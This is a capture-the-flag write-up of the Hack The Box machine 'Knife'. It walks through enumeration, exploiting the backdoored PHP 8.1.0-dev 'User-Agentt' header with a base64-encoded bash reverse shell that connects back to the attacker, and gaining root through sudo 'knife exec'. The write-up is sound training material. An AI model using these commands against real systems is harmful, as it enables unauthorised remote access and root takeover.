Knife Writeup

10 September 2022 #CTF #HTB #box #easy #linux

[image: Knife info]

Enumeration

Let's start with a quick nmap scan (-F: the 100 most common ports only, -sC: default scripts, -sV: version detection):

$ sudo nmap -F -sC -sV -oN enum/initial.nmap 10.10.10.242
[...]
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
[...]

HTTP

The web server is giving us a static page that does nothing.

[screenshot: static web page]

The menu at the top is just plain text, no links...

Let's take a look at the response headers with curl:

$ curl -I 10.10.10.242
HTTP/1.1 200 OK
Date: Mon, 29 Aug 2022 09:26:41 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

-I makes curl perform a HEAD request, only retrieving the headers.

The X-Powered-By header is the interesting part: PHP 8.1.0-dev is a development build, not a released version. Let's feed it to searchsploit:

$ searchsploit 'PHP 8.1.0-dev'
[...]
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
[...]

Foothold

This is not a bug but a backdoor: in March 2021 the php-src git server was compromised and malicious commits were pushed, so 8.1.0-dev builds from that window carry it. The backdoored code looks for a 'User-Agentt' request header; if its value contains the string 'zerodium', everything after the first eight characters is evaluated as PHP code.

Knowing this, it becomes trivial to get a shell on the box. With a listener waiting on port 4242 of our machine, we wrap a reverse shell in base64 and have PHP's system() decode and run it:

$ echo -n 'bash -i  >& /dev/tcp/10.10.14.10/4242  0>&1' | base64 -w 0
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTAvNDI0MiAgMD4mMQ==
$ curl -H "User-Agentt: zerodiumsystem('echo -n YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTAvNDI0MiAgMD4mMQ==|base64 -d|bash');" 10.10.10.242

We encode our payload in base64 so that quotes, redirections and spaces never have to be escaped inside the PHP single-quoted string. When the payload travels in a URL or form field, make sure the base64 contains no '+' or '/' (just add spaces to the command until they are gone), since those characters would be mangled by URL encoding. In a header value they are safe, but avoiding them is good practice anyway.

Privesc

We have a shell as the 'james' user. A good place to start is to check sudo rules:

james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

(Whether sudo -l asks for a password depends on the sudoers 'listpw' option; with the default setting it does not prompt as long as at least one of the user's rules carries NOPASSWD, which is the case here.)

We can run this knife executable as root without a password.

Let's try to learn more about this program:

james@knife:/$ ls -l /usr/bin/knife
lrwxrwxrwx 1 root root 31 May  7  2021 /usr/bin/knife -> /opt/chef-workstation/bin/knife

Ok, so it is a symlink into /opt/chef-workstation. A quick search confirms that Chef Workstation is a real product: knife is the command-line tool used to manage Chef infrastructure, and it is written in Ruby.

Scrolling through the docs, we come across the exec subcommand, which runs Ruby scripts; its -E (--exec) option takes the code to run as a string instead of a file. Since sudo runs it as root, that Ruby code runs as root too:

james@knife:/$ sudo knife exec -E 'system("id")'
uid=0(root) gid=0(root) groups=0(root)

Boom.

Key Takeaways